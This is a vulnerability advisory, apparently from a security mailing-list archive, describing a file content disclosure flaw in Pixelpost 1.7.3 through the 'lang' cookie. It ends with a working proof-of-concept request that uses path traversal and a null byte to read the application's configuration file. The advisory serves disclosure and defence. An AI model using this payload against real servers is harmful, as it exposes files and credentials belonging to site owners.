[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22791: File Content Disclosure in Pixelpost



Vulnerability ID: HTB22791
Reference: http://www.htbridge.ch/advisory/file_content_disclosure_in_pixelpost.html
Product: Pixelpost
Vendor: Pixelpost ( http://www.pixelpost.org/ ) 
Vulnerable Version: 1.7.3
Vendor Notification: 11 January 2011 
Vulnerability Type: File Content Disclosure
Status: Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "lang" variable from cookie when register_globals is on.
Successful exploitation of this vulnerability allows remote attacker to obtain content of arbitrary file accessible within the context of vulnerable application.

The following PoC is available:


GET /index.php?popup=comment&language_full=english HTTP/1.1
Cookie: lang=/../../../includes/pixelpost.php%00